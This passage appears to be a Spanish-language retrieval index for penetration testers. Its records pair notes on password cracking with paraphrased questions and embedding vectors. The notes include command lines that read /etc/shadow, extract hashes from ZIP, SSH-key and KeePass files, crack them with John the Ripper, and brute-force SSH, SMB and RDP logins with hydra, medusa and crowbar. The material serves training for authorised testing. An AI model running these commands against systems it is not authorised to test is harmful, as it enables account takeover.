-0.07901, -0.02623, -0.02481, 0.05124, 0.02624, -0.03261, -0.04284, 0.05512, -0.05458, 0.04616, -0.05268, 0.00285, -0.07237, -0.06887, 0.0458, -0.0708, -0.06021, 0.03756, 0.07227, 0.09292, -0.04032, 0.00894, -0.00293, -0.0466, -0.06026, 0.02998, -0.04392, 0.00503, 0.01471, -0.04097, -0.02807, 0.01094, 0.03857, 0.07079, 0.03248, 0.08776, 0.07876, -0.08693, -0.00527, -0.01244, -0.07825, -0.02389, -0.02383, 0.00954, 0.0705, 0.03314, -0.01237, 0.03166, 0.03931, -0.04185, 0.07982, -0.03855, 0.00471, -0.02233, -0.01694, 0.00639, 0.02431, 0.00852, 0.03016, 0.04117, 0.03708, -0.00246, -0.01902, 0.03161, 0.02868, -0.04309, -0.07467, -0.01061, 0.07138, -0.08393, 0.02613, -0.05594, -0.02096, -0.06521, 0.05934, 0.05192, 0.00049, 0.00754, 0.01868]} -{"tipo": "pregunta", "herramienta": "Cracking de contraseΓ±as", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseΓ±as.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## John the Ripper\n```bash\nunshadow /etc/passwd /etc/shadow > unshadowed\njohn --format=NT hashes.txt --wordlist=rockyou.txt\nzip2john file.zip > z.hash ; rar2john ; ssh2john id_rsa ; keepass2john # extractores\njohn --rules --wordlist=rockyou.txt z.hash\n```", "indexar": "que programa sirve para probar contraseΓ±as de archivos y bases de datos?", "v": [0.04768, -0.02011, -0.08889, -0.30673, 0.00134, -0.16642, 0.07006, -0.11652, -0.10568, -0.05008, -0.04689, -0.07994, -0.02681, -0.0907, -0.05856, 0.01004, 0.14928, -0.06725, 0.07887, 0.00749, 0.028, -0.02519, -0.07827, -0.02734, -0.09795, -0.02794, 0.02736, 0.01624, -0.08545, 0.06676, -0.04128, -0.06435, 0.06544, -0.00491, -0.05508, 0.13193, 0.01491, 0.07682, -0.01969, 0.04264, 0.0529, -0.0024, -0.10411, 0.10445, 0.0516, 0.00585, -0.00026, 0.02886, 0.05122, -0.08567, -0.06731, -0.04634, -0.00515, -0.02488, -0.04817, -0.14189, -0.02878, -0.1022, -0.01356, 0.08604, -0.12594, 0.02373, 0.06714, 0.00912, -0.05887, -0.07692, 0.08509, 0.05791, -0.14491, 0.12395, 0.01772, 0.11716, 0.00169, -0.03288, -0.04828, -0.0657, 0.09525, -0.035, -0.02641, 0.02963, -0.08143, -0.00612, -0.01843, 0.07915, -0.12043, 0.02806, 0.0489, 0.01441, 0.00469, -0.05019, 0.13487, 0.06396, -0.00359, 0.10202, 0.06206, -0.0304, 0.10166, -0.02623, 0.0064, -0.01737, -0.00798, -0.01088, -0.01246, 0.14014, -0.02622, 0.12157, 0.08087, 0.05451, -0.03959, -0.06772, -0.01211, -0.03987, -0.07101, 0.01512, -0.04716, -0.04202, 0.00121, -0.0798, 0.02731, -0.00034, 0.00203, 0.0038, -0.02476, 0.0479, 0.05754, 0.03268, 0.00223, 0.06784, -0.03291, 0.08393, 0.04649, 0.02326, -0.07236, 0.07643, -0.01195, 0.03262, 0.02338, -0.03609, -0.09195, -0.06339, 0.03663, 0.09061, -0.00972, 0.04672, 0.07763, 0.04433, 0.04997, 0.03755, -0.04342, -0.00715, -0.0501, -0.00509, 0.03392, 0.0677, -0.12931, -0.00858, 0.00113, -0.14239, -0.07236, 0.09526, -0.04348, 0.04948, -0.11446, 0.01362, -0.00491, -0.08001, 0.05138, 0.05523, 0.08562, 0.09269, 0.01105, 0.11634, 0.03081, -0.10382, 0.026, 0.0349, -0.0521, -0.13666, -0.00417, -0.04717, -0.00538, -0.03848, 0.0315, 0.02725, 0.02923, -0.06236, 0.04939, 0.00015, 0.01699, -0.0161, 0.00911, 0.03284, -0.03491, 0.02911, -0.00779, -0.0533, -0.04193, 0.01672, 0.01979, -0.05571, -0.01498, 0.02179, -0.07059, 0.00778, 0.03113, 0.06976, -0.03791, -0.07256, 0.03253, -0.01038, 0.00463, -0.00841, 0.04536, -0.0288, -0.08052, -0.07192, 0.01513, 0.07408, 0.03611, 0.02029, -0.03431, 0.02731, 0.0488, 0.06646, -0.02204, -0.04615, 0.02396, -0.01782, 0.03929, -0.05118, 0.01978, 0.00889, -0.00291, 0.00677, 0.06115, -0.02462, -0.07032, -0.0329, -0.01502, -0.11332, -0.04822, 0.08027, -0.02588, -0.0878, -0.03506, -0.00697, -0.03643, 0.01713, 0.03292, -0.00767, -0.06334, 0.01329, 0.00549, 0.00568, 0.01785, 0.00432]} -{"tipo": "pregunta", "herramienta": "Cracking de contraseΓ±as", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseΓ±as.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## John the Ripper\n```bash\nunshadow /etc/passwd /etc/shadow > unshadowed\njohn --format=NT hashes.txt --wordlist=rockyou.txt\nzip2john file.zip > z.hash ; rar2john ; ssh2john id_rsa ; keepass2john # extractores\njohn --rules --wordlist=rockyou.txt z.hash\n```", "indexar": "con que puedo extraer hashes de un zip y hacer pruebas de fuerza?", "v": [0.04033, -0.03985, -0.24936, -0.0691, 0.02512, 0.04091, -0.05667, 0.05823, 0.03239, -0.08571, -0.07181, 0.09502, -0.06085, 0.03265, 0.06442, 0.03378, 0.08598, 0.01935, -0.16994, -0.02372, -0.00365, -0.04839, -0.16617, -0.10345, 0.00547, 0.06589, -0.14653, 0.15295, -0.22828, -0.02301, -0.06482, 0.11567, 0.05104, 0.02323, -0.04072, 0.21852, -0.00507, 0.07491, 0.10088, 0.06924, -0.05896, 0.09797, -0.11662, -0.00229, -0.09383, 0.03552, -0.03414, 0.03077, 0.01539, -0.08339, -0.01266, -0.0831, -0.07602, -0.07073, -0.10215, -0.13108, -0.02965, -0.01361, -0.15926, 0.01175, 4e-05, 0.06408, -0.00806, -0.03319, 0.00609, -0.05571, -0.02555, 0.03047, -0.13259, 0.00505, -0.12987, 0.06505, -0.00439, -0.04188, -0.16818, 0.02567, -0.00291, -0.11474, -0.04607, 0.0202, -0.05301, 0.01193, -0.06743, -0.01998, -0.05414, -0.03245, -0.01229, -0.07865, 0.03159, -0.02266, 0.09017, 0.03921, 0.01965, 0.05312, -0.05626, -0.02444, 0.01923, 0.05576, 0.00585, -0.05156, 0.01674, -0.03518, -0.04049, 0.03774, 0.01647, -0.08855, 0.06421, 0.05219, 0.04713, 0.03379, 0.04206, -0.02333, -0.082, -0.01639, -0.13059, -0.01034, -0.06276, -0.02855, -0.12479, 0.03623, -0.04517, -0.08626, -0.02753, 0.02817, -0.01937, -0.05361, 0.03756, 0.01497, 0.02126, -0.03548, 0.13254, 0.11732, -0.02351, -0.00319, 0.07835, -0.01001, 0.04809, -0.03917, 0.01916, -0.09976, 0.02968, 0.00608, 0.04931, -0.03578, 0.01277, 0.01284, -0.10228, 0.04234, -0.04477, -0.04536, 0.02966, -0.0517, 0.01969, 0.07978, -0.07149, -0.02041, 0.07282, -0.0151, -0.02838, 0.02021, -0.08734, -0.02687, -0.11217, -0.00274, 0.04564, 0.07144, -0.07825, -0.02927, -0.05191, -0.02434, -0.0303, -0.04776, 0.0143, -0.00679, 0.09379, 0.03711, 0.00953, 0.00865, -0.06365, -0.03003, -0.00732, 0.02688, -0.06141, 0.00292, 0.02776, -0.00835, 0.06314, -0.00033, 0.06305, -0.01625, 0.01389, 0.09257, -0.01477, 0.07006, -0.00957, 0.04551, 0.05888, 0.03171, -0.00791, -0.03365, -0.05138, -0.07331, 0.01799, -0.02063, -0.025, 0.01983, -0.0294, 0.00577, 0.00177, -0.04157, 0.01854, 0.0476, 0.07133, -0.08319, -0.09252, 0.01417, 0.00503, 0.01142, -0.02703, -0.0058, -0.04371, 0.08508, 0.07389, 0.02043, -0.01838, 0.05712, 0.041, 0.00771, 0.01386, 0.04382, 0.04222, 0.01042, 0.02121, 0.01979, -0.01118, -0.00262, -0.01672, 0.04232, -0.05219, -0.03368, -0.03392, 0.03802, -0.0103, -0.03616, -0.03054, -0.003, -0.03884, 0.0258, 0.00214, -0.04943, -0.00623, -0.01826, 0.07117, -0.02375, 0.03361, 0.0098]} -{"tipo": "pregunta", "herramienta": "Cracking de contraseΓ±as", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseΓ±as.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## John the Ripper\n```bash\nunshadow /etc/passwd /etc/shadow > unshadowed\njohn --format=NT hashes.txt --wordlist=rockyou.txt\nzip2john file.zip > z.hash ; rar2john ; ssh2john id_rsa ; keepass2john # extractores\njohn --rules --wordlist=rockyou.txt z.hash\n```", "indexar": "necesito una herramienta para romper contraseΓ±as de sistemas Windows, cual me recomiendas?", "v": [0.08008, 0.12441, -0.17099, -0.16427, 0.04459, -0.13902, -0.0886, -0.08087, -0.0732, -0.11561, -0.06063, -0.04944, 0.00404, -0.12705, 0.04408, 0.0137, 0.04119, -0.03109, 0.07403, 0.10909, -0.034, -0.15219, -0.11848, -0.01946, -0.05868, -0.0412, 0.04373, -0.03168, -0.16961, 0.02847, -0.03232, -0.06489, 0.04783, -0.04732, -0.1363, 0.06396, -0.0567, 0.07424, -0.00945, 0.06187, 0.09691, 0.14378, -0.13627, 0.12874, 0.05316, -0.03173, -0.00076, -0.04835, 0.06879, 0.02155, -0.08856, -0.0928, -0.08319, -0.01149, 0.0595, -0.18066, 0.20134, 0.00545, 0.01198, 0.01181, -0.08509, 0.06688, 0.01299, 0.02153, -0.05824, -0.05533, -0.00881, -0.10238, -0.0432, 0.12967, -0.05373, 0.01002, 0.03162, 0.04012, 0.03833, 0.0709, 0.04251, -0.02911, 0.0918, 0.00554, 0.0258, 0.0564, -0.00137, 0.01337, -0.09265, -0.1277, 0.07042, 0.0139, 0.074, -0.09024, 0.04317, -0.04786, -0.06422, 0.05507, 0.05331, -0.09082, 0.00943, 0.04659, -0.06337, 0.08226, 0.01383, -0.08435, -0.05512, 0.10531, -0.0916, -0.05737, -0.0486, -0.00582, -0.01711, -0.06306, 0.073, 0.03719, 0.0083, -0.01597, -0.01442, 0.01122, -0.03842, -0.09033, -0.00348, 0.01119, -0.04873, 0.02681, -0.09407, -0.0181, 0.02452, 0.00129, 0.00671, 0.06571, -0.05195, -0.04271, 0.01893, -0.05527, -0.06813, -0.0188, -0.02594, 0.08549, 0.04735, -0.11037, -0.05593, -0.09945, 0.03608, 0.0304, 0.00606, -0.03042, 0.07128, 0.14083, 0.09851, -0.0302, -0.01976, 0.01207, 0.00734, 0.00314, -0.04267, 0.01552, -0.043, 0.03198, 0.00495, -0.00605, -0.04961, 0.02971, 0.01462, -0.01576, 0.02618, -0.00073, -0.05948, -0.04607, 0.03518, 0.07578, 0.0689, 0.03581, 0.04405, 0.10351, 0.00606, -0.03366, 0.03876, -0.06229, -0.01376, -0.04843, -0.05423, -0.07236, -0.07278, 0.04139, -0.00756, -0.01868, -0.02455, -0.0197, -0.00071, -0.00608, -0.00872, 0.04871, 0.00885, 0.00011, -0.02852, -0.03001, 0.04334, 0.00418, -0.0243, -0.07249, 0.02893, -0.02456, -0.08558, 0.01646, -0.06429, -0.11042, 0.06039, 0.06292, -0.06051, -0.00888, -0.00157, 0.02898, 0.06434, -0.02716, -0.01158, -0.05278, -0.055, -0.08827, -0.00052, 0.03372, -0.04633, -0.00054, 0.05441, 0.02987, 0.06296, 0.03467, 0.01146, -0.03012, -0.01791, 0.01244, 0.02028, -0.00532, 0.00539, -0.01047, 0.00052, -0.00992, 0.0851, -0.00147, -0.01642, -0.09501, -0.0382, -0.03566, -0.01129, 0.11368, 0.00614, -0.08399, -0.03761, -0.03536, -0.03165, -0.00039, -0.028, -0.09646, -0.02336, 0.03082, 0.03382, -0.04603, 0.02627, -0.02111]} -{"tipo": "pregunta", "herramienta": "Cracking de contraseΓ±as", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseΓ±as.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Wordlists a medida\n```bash\ncewl http://IP -m 6 -w custom.txt # palabras de la propia web\ncrunch 8 8 -t @@@@%%%% -o crunch.txt # patrones\n```", "indexar": "ΒΏQuΓ© programa puedo usar para generar listas de palabras basadas en el contenido de una web?", "v": [-0.07095, 0.15185, -0.0075, -0.10274, -0.03547, -0.11356, -0.01336, -0.14079, -0.07059, -0.19961, -0.11123, -0.09715, -0.06752, -0.03191, -0.05804, 0.04848, 0.09697, -0.1308, 0.05009, 0.01089, 0.03462, -0.0614, -0.10885, -0.08071, -0.0913, -0.07106, 0.0871, -0.03224, -0.03541, 0.10324, -0.04041, -0.00826, 0.04715, -0.09206, -0.05465, 0.0406, 0.02394, 0.08824, -0.01469, 0.03683, 0.00673, 0.00627, -0.07922, 0.02668, -0.04978, 0.02816, -0.00911, -0.05577, -0.01963, -0.05372, 0.01969, -0.04797, -0.04225, 0.04521, 0.0249, -0.09725, 0.08142, -0.18194, -0.05889, -0.0247, -0.0897, 0.03562, 0.04885, -0.03632, -0.0767, -0.02347, -0.01351, 0.13591, -0.0654, 0.11658, -0.0183, -0.01127, 0.09597, -0.03256, 0.09189, 0.05584, -0.02355, -0.05061, -0.02756, 0.05916, 0.00918, -0.07661, 0.06, 0.10678, -0.10113, -0.01712, 0.06917, -0.06216, -0.02913, -0.11637, -0.03986, 0.04901, 0.00317, 0.06833, -0.00274, -0.15402, 0.00755, 0.056, 0.0365, 0.03183, 0.02061, -0.06007, -0.00937, 0.06722, -0.03873, 0.01941, 0.11043, 0.00614, -0.09057, -0.02585, 0.04077, -0.07153, -0.12222, -0.11062, -0.07889, 0.04358, -0.01614, -0.03783, 0.03156, -0.15064, -0.05873, 0.08584, -0.03815, 0.0164, 0.09764, 0.0632, 0.02142, 0.11178, -0.1098, 0.02445, 0.02287, 0.04251, -0.05024, -0.15428, -0.01028, -0.0796, 0.02017, -0.00472, 0.02756, -0.00104, -0.00858, -0.00966, -0.0936, 0.04887, 0.01205, -0.0832, 0.04473, -0.03957, -0.12845, 0.0204, -0.00257, -0.05582, 0.01361, 0.04519, -0.07561, -0.02733, 0.03096, -0.05201, -0.06213, 0.0494, -0.02485, -0.03589, -0.06936, -0.01916, 0.10916, 0.00885, -0.06421, 0.07883, 0.04244, 0.11142, 0.00476, 0.1313, 0.10914, -0.09175, -0.00758, 0.003, -0.08519, -0.0224, -0.08542, -0.06782, -0.10937, -0.02286, -0.03189, 0.01951, 0.03018, -0.01604, 0.03146, 0.03198, -0.06212, 0.02846, -0.0971, 0.02449, -0.0358, -0.02539, 0.04339, -0.03607, -0.00264, 0.03044, 0.02245, -0.11653, -0.01823, -0.05345, -0.01166, -0.02549, 0.0095, 0.08704, -0.04338, -0.0325, 0.00649, 0.0757, -0.01791, 0.00603, 0.00082, 0.01274, -0.07106, -0.00094, -0.06132, 0.02958, 0.01605, 0.01391, 0.03113, 0.04148, -0.00635, 0.04345, 0.0422, -0.04009, -0.00754, -0.00822, 0.05408, 0.00694, -0.04268, -0.02571, -0.00566, -0.04522, -0.00347, -0.0355, -0.03261, 0.02597, -0.01088, -0.02037, -0.03253, 0.08158, 0.02621, -0.03354, -0.02262, 0.03198, -0.04416, 0.00115, -0.04457, -0.02374, -0.08527, -0.0079, 0.00353, -0.03334, 0.07147, 0.02608]} -{"tipo": "pregunta", "herramienta": "Cracking de contraseΓ±as", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseΓ±as.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Wordlists a medida\n```bash\ncewl http://IP -m 6 -w custom.txt # palabras de la propia web\ncrunch 8 8 -t @@@@%%%% -o crunch.txt # patrones\n```", "indexar": "Con quΓ© herramienta creo listas de contraseΓ±as con patrones especΓ­ficos?", "v": [0.13959, 0.07919, -0.10585, -0.1546, 0.05144, -0.1713, 0.12012, -0.1217, -0.14045, -0.09956, -0.03777, 0.08782, -0.02739, -0.12723, 0.06437, 0.04373, 0.05863, -0.02441, 0.08517, 0.06767, -0.09533, -0.08103, -0.15894, -0.01467, -0.06695, -0.15631, 0.08203, -0.03368, -0.11518, 0.1196, -0.00403, 0.00106, 0.00762, 0.00945, -0.07507, 0.08608, -0.01901, 0.13928, -0.02774, 0.07446, 0.05362, 0.02539, -0.14355, 0.06229, 0.01087, -0.05403, -0.07044, 0.05766, 0.03887, 0.09145, -0.04739, -0.1533, -0.1196, -0.07305, -0.00191, -0.24119, 0.09523, 0.06521, 0.01856, -0.04434, -0.17835, 0.07742, 0.03805, 0.05307, -0.04109, -0.05942, 0.01235, -0.06898, -0.07435, 0.08749, -0.00683, -0.03733, 0.07016, 0.01998, 0.08676, 0.01731, 0.10379, 0.0605, -0.0219, 0.07415, -0.05081, -0.07232, 0.02578, -0.01571, -0.07245, 0.0026, 0.00677, 0.04342, 0.04121, -0.13729, 0.03439, 0.00244, -0.03807, 0.07913, 0.00125, -0.00816, 0.01421, 0.07218, -0.0434, -0.00337, 0.02035, 0.03098, 0.00719, 0.16432, 0.01256, -0.00269, -0.04241, -0.02229, -0.05133, -0.05404, 0.08775, 0.00921, -0.00241, -0.0324, 0.00368, -0.01932, -0.07259, -0.02921, -0.0165, -0.07914, 0.03002, 0.01337, 0.0066, 0.02261, 0.02792, 0.08569, -0.00338, 0.11116, -0.05402, -0.1201, -0.00294, 0.00084, -0.08783, 0.03596, -0.04793, 0.00262, -0.00417, -0.13538, -0.02522, -0.02681, -0.02414, -0.01841, 0.02352, -0.02369, 0.08287, 0.04289, 0.03189, -0.04461, -0.06344, 0.04805, 0.01629, -0.02506, 0.03233, 0.00403, -0.02005, 0.04208, -0.03943, -0.04037, -0.04406, 0.05978, -0.02407, -0.11367, -0.02823, -0.02754, -0.0388, -0.00667, 0.03407, 0.07051, 0.03513, 0.05934, 0.04524, 0.0603, 0.04447, -0.04145, 0.01454, -0.06195, -0.05252, -0.03169, 0.02295, -0.07826, -0.0643, -0.01662, 0.01175, -0.02521, 0.03622, -0.10708, 0.0888, -0.00702, 0.01403, 0.04903, 0.00061, -0.00139, 0.01229, -0.00227, 0.04328, 0.01549, 0.0086, -0.04625, -0.02031, -0.05695, -0.02329, -0.00088, -0.0213, -0.06025, 0.07751, 0.07081, -0.06781, -0.04411, -0.00514, 0.01863, 0.06454, 0.00766, 0.01364, -0.02946, -0.04981, -0.02154, -0.04469, 0.05099, -0.03476, -0.02016, 0.07494, 0.02933, 0.03153, 0.00233, 0.00508, 0.01712, -0.00532, 0.00727, 0.06699, 0.00384, 0.02812, -0.01426, -0.01336, -0.00659, 0.0239, -0.01349, -0.05696, -0.0414, -0.04438, 0.01139, -0.0394, 0.03835, 0.04865, -0.0552, -0.04688, -0.01455, -0.01019, -0.02761, -0.03902, -0.06733, -0.04457, 0.01179, -0.00927, -0.06114, 0.03675, -0.0288]} -{"tipo": "pregunta", "herramienta": "Cracking de contraseΓ±as", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseΓ±as.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Online (servicio en vivo)\n```bash\nhydra -L users.txt -P rockyou.txt ssh://IP # ver Authentication attacks\nmedusa -h IP -u admin -P pass.txt -M smbnt\nfcrackzip -u -D -p rockyou.txt secret.zip # ZIP\ncrowbar -b rdp -s IP/32 -u admin -C pass.txt # RDP\n```\n\nRelacionado: Authentication attacks Β· Kerberoasting Β· Pass-the-Hash Β· OSCP MOC", "indexar": "que programa sirve para ataques de autenticaciΓ³n remota en lΓ­nea?", "v": [0.02095, 0.02389, -0.2225, -0.14152, 0.13014, -0.07974, 0.0538, -0.00372, -0.03768, 0.11926, -0.00319, -0.11991, 0.1077, -0.02062, 0.10139, -0.02309, 0.03689, 0.01882, 0.15557, -0.03469, 0.01201, -0.012, 0.06375, -0.04057, -0.06647, -0.03621, 0.0921, 0.04987, 0.01065, -0.05492, 0.05618, -0.01685, 0.08481, -0.02138, 0.02419, 0.00983, 0.00899, 0.112, 0.1137, 0.08941, 0.09012, -0.01908, -0.14521, -0.10077, 0.14135, 0.01328, 0.10749, 0.0506, 0.03433, -0.02179, -0.07012, 0.03372, -0.06253, -0.01581, -0.07628, -0.06344, 0.04373, -0.12342, 0.05291, 0.03916, -0.07529, -0.07879, 0.05005, -0.15065, 0.07651, -0.04218, 0.03091, -0.07403, -0.12716, -0.00183, -0.04732, 0.00868, 0.04829, 0.00051, -0.00769, -0.0372, -0.04425, 0.00057, 0.07757, -0.06046, -0.00878, 0.00857, -0.01577, -0.0113, -0.12646, -0.02639, 0.01971, -0.01594, -0.03285, -0.06426, 0.05569, 0.05109, -0.019, 0.01424, 0.01376, -0.05401, 0.03601, -0.10188, 0.05209, -0.05086, 0.01925, -0.07931, -0.09237, 0.11399, -0.0468, 0.09223, 0.04667, -0.01557, -0.02971, 0.01278, -0.04549, -0.08352, -0.04827, -0.02709, -0.03045, -0.04993, -0.04285, -0.027, 0.09165, -0.02817, -0.11666, 0.0023, -0.02041, 0.03353, 0.07369, 0.04228, -0.06333, 0.04812, 0.00507, -0.02602, -0.01413, 0.0282, -0.00296, -0.01956, -0.07654, -0.0478, -0.01032, -0.13214, 0.00919, -0.06382, 0.07451, 0.12784, -0.00698, 0.05135, 0.03118, 0.00323, -0.01624, -0.13311, -0.08753, 0.02399, 0.05849, 0.03079, -0.03181, 0.10938, -0.10141, -0.03826, -0.04091, -0.02531, -0.07167, 0.09823, -0.03028, -0.02694, -0.00731, -0.05138, -0.01071, -0.04261, -0.02098, 0.01513, 0.09813, 0.09969, -0.05804, 0.12111, 0.07716, -0.09553, -0.01855, 0.00545, 0.00284, -0.09598, 0.04013, -0.04791, -0.12876, -0.05732, 0.02913, -0.03308, 0.00385, 0.01511, -0.0041, 0.01156, 0.03832, 0.03562, 0.01893, -0.05004, -0.07895, 0.06542, 0.00491, -0.00313, -0.05164, 0.00263, 0.07852, -0.03205, -0.06022, -0.07243, -0.0067, -0.02583, 0.08504, 0.1202, 0.00335, -0.06202, 0.00247, 0.13417, 0.01562, -0.08247, 0.06202, -0.05275, -0.06676, -0.05054, 0.04789, -0.04556, 0.01303, 0.06821, -0.01595, -0.04166, -0.00778, 0.09167, 0.0221, 0.0045, 0.00226, -0.0597, 0.00689, -0.00884, 0.02836, -0.07053, -0.03865, -0.04808, 0.03361, -0.04372, 0.04319, -0.01169, -0.0336, -0.04753, -0.06306, 0.07298, -0.03162, -0.06385, -0.00466, -0.03704, -0.08407, 0.0113, -0.00431, -0.03663, -0.08025, -0.00986, 0.03667, 0.02084, 0.03541, 0.03606]} -{"tipo": "pregunta", "herramienta": "Cracking de contraseΓ±as", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseΓ±as.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Online (servicio en vivo)\n```bash\nhydra -L users.txt -P rockyou.txt ssh://IP # ver Authentication attacks\nmedusa -h IP -u admin -P pass.txt -M smbnt\nfcrackzip -u -D -p rockyou.txt secret.zip # ZIP\ncrowbar -b rdp -s IP/32 -u admin -C pass.txt # RDP\n```\n\nRelacionado: Authentication attacks Β· Kerberoasting Β· Pass-the-Hash Β· OSCP MOC", "indexar": "con quΓ© puedo hacer pruebas de fuerza bruta a conexiones SSH, SMB y RDP?", "v": [0.06272, -0.131, -0.17709, -0.06909, 0.00954, 0.07004, -0.01766, -0.13058, 0.03271, 0.03785, -0.10742, 0.09948, 0.0662, -0.16084, -0.0562, 0.00995, -0.09961, -0.03578, -0.21998, -0.08694, 0.14867, -0.18329, -0.00725, -0.06351, 0.03765, 0.00039, 0.01363, 0.20291, 0.00125, -0.03072, -1e-05, 0.08916, 0.12101, 0.01537, -0.04497, 0.06481, -0.0154, 0.05935, 0.22086, 0.01248, -0.02409, -0.00992, -0.0282, -0.06193, 0.04258, 0.04276, -0.04196, 0.02198, -0.08314, 0.04627, -0.17002, 0.02619, -0.15806, -0.07755, -0.18254, -0.02689, 0.06645, -0.09877, -0.0448, 0.09061, -0.05446, 0.03268, 0.00863, -0.02526, 0.0467, -0.06812, -0.027, -0.01372, -0.04751, 0.02488, -0.15619, 0.00866, -0.02107, -0.02791, -0.08956, 0.03719, 0.02568, 0.02317, -0.00959, 0.02017, -0.09137, -0.02308, -0.12066, 0.0395, -0.07507, 0.00645, 0.01254, -0.08421, 0.00167, -0.07381, 0.01254, 0.01612, 0.05436, 0.09398, -0.01267, -0.01269, -0.04582, 0.01896, 0.04091, -0.05675, 0.01351, 0.05448, -0.06325, -0.00676, 0.02287, -0.07151, 0.04754, 0.03995, 0.0479, 0.08299, 0.0122, -0.00335, -0.06868, 0.01185, -0.0982, -0.04426, -0.11784, -0.10944, -0.10457, -0.01144, -0.04751, -0.05648, -0.04177, 0.0137, -0.06416, 0.04779, 0.11688, 0.02857, 0.01393, 0.01485, 0.09791, 0.06371, 0.02904, -0.07238, 0.05039, -0.03328, 0.02572, -0.06763, 0.04782, -0.11715, -0.00893, -0.00415, 0.08419, -0.03139, -0.01085, 0.04531, -0.0647, -0.03196, -0.05377, 0.01408, 0.06997, -0.05536, -0.02729, 0.07634, 0.01529, 0.02173, 0.08935, -0.0533, -0.01249, 0.03533, -0.08949, -0.04169, -0.11142, -0.00726, 0.05218, 0.05363, -0.08659, -0.00616, -0.01846, -0.01286, -0.03229, -0.01639, 0.04753, -0.00228, 0.04863, -0.06521, -0.03585, 0.00521, -0.03782, -0.00636, -0.01911, -0.00613, -0.01188, 0.00576, 0.05674, 0.03434, 0.01816, -0.02917, 0.09608, -0.01711, -0.01633, 0.107, -0.00072, 0.05436, -0.00765, -0.01965, 0.03465, 0.00101, -0.01102, 0.01504, -0.05809, -0.06147, -0.05567, -0.0414, 0.01739, 0.01983, 0.0076, 0.0527, 0.01322, -0.00864, 0.05856, 0.0166, 0.06765, -0.11288, -0.03343, -0.00154, -0.03527, 0.02829, 0.04045, 0.01925, -0.05424, 0.05444, -0.02561, 0.03261, -0.00755, -0.00475, -0.00664, -0.03207, 0.04745, 0.01253, 0.01631, -0.00763, 0.06294, 0.00819, 0.00274, 0.01498, -0.03452, 0.05499, -0.03055, 0.02226, -0.04616, -0.00922, -0.02028, -0.01809, -0.02925, 0.01634, -0.05186, -0.04376, -0.01921, -0.00649, 0.03024, 0.00497, 0.04376, -0.01801, 0.0147, 0.00677]} -{"tipo": "pregunta", "herramienta": "Cracking de contraseΓ±as", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseΓ±as.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Online (servicio en vivo)\n```bash\nhydra -L users.txt -P rockyou.txt ssh://IP # ver Authentication attacks\nmedusa -h IP -u admin -P pass.txt -M smbnt\nfcrackzip -u -D -p rockyou.txt secret.zip # ZIP\ncrowbar -b rdp -s IP/32 -u admin -C pass.txt # RDP\n```\n\nRelacionado: Authentication attacks Β· Kerberoasting Β· Pass-the-Hash Β· OSCP MOC", "indexar": "cual es una herramienta para probar vulnerabilidades de contraseΓ±as en servicios online", "v": [0.13076, 0.02821, -0.12339, -0.2047, -0.02277, -0.1078, -0.02107, -0.07812, -0.05353, -0.07133, -0.02564, -0.05842, -0.01342, -0.08308, -0.04086, 0.04368, 0.11576, -0.14331, 0.05991, 0.07979, -0.03243, -0.02661, -0.12109, -0.01781, -0.09755, -0.03579, 0.0288, -0.05262, -0.08355, 0.03225, -0.04954, -0.07183, 0.08179, 0.01332, -0.07904, 0.08798, 0.00393, 0.09859, 0.08701, 0.08845, 0.10523, 0.02287, -0.07797, 0.09371, 0.03941, 0.01078, -0.05058, -0.02167, 0.0427, 0.04409, -0.08084, -0.15211, -0.15961, -0.08252, -0.00565, -0.11252, 0.17734, -0.09197, 0.03663, -0.03922, -0.13265, 0.01413, 0.02302, 0.0365, -0.03207, -0.1263, 0.00054, 0.01178, -0.19016, 0.15186, 0.04534, 0.03158, -0.03837, -0.00504, -0.05027, -0.01665, 0.02951, 0.01102, 0.0014, 0.036, -0.02235, 0.04636, -1e-05, 0.05306, -0.18659, -0.07978, 0.05444, 0.0044, 0.10043, -0.04535, 0.1136, 0.0676, -0.01676, 0.03081, -0.02814, -0.04645, 0.11604, -0.0499, -0.05521, -0.09843, 0.02466, 0.02255, -0.05716, 0.12014, -0.06809, 0.02114, -0.05039, 0.04677, -0.02015, -0.09693, 0.0353, -0.00848, -0.05328, 0.01251, 0.02742, 0.02312, -0.01353, -0.07031, 0.05236, -0.0341, 0.02099, -0.02029, -0.03721, -0.00377, 0.03924, 0.07784, 0.00697, -0.0157, -0.03843, -0.11438, 0.02498, -0.05359, -0.07179, 0.03506, 0.0326, 0.05144, 0.03042, -0.16615, -0.05544, -0.03405, 0.0069, -0.00653, -0.01205, -0.01877, 0.04737, 0.06051, 0.03542, -0.00534, -0.09525, 0.06141, -0.02278, -0.0003, -0.03384, 0.04163, -0.06807, 0.00721, -0.12217, -0.04964, -0.10006, 0.10607, 0.00436, -0.01242, 0.04499, 0.05398, -0.04223, -0.02052, 0.05926, 0.05419, 0.09029, 0.01847, 0.02006, 0.06211, 0.04685, -0.05, 0.00728, -0.01807, -0.04476, -0.05477, 0.02091, -0.09775, -0.01355, -0.05381, -0.02817, -0.015, 0.00568, -0.03548, 0.07438, -0.01389, 0.00261, 0.02482, -0.01057, -0.04611, -0.07952, 0.04974, 0.07119, -0.00208, -0.02442, -0.05124, -0.02349, -0.08262, -0.07057, -0.04508, -0.07522, -0.06046, 0.01401, 0.05764, -0.00485, -0.06187, -0.0501, 0.04092, 0.0246, -0.00157, 0.05314, -0.08727, -0.06391, -0.05776, 0.00756, 0.01616, -0.04779, -0.02141, -0.00777, -0.03956, 0.03133, 0.04877, 0.0145, 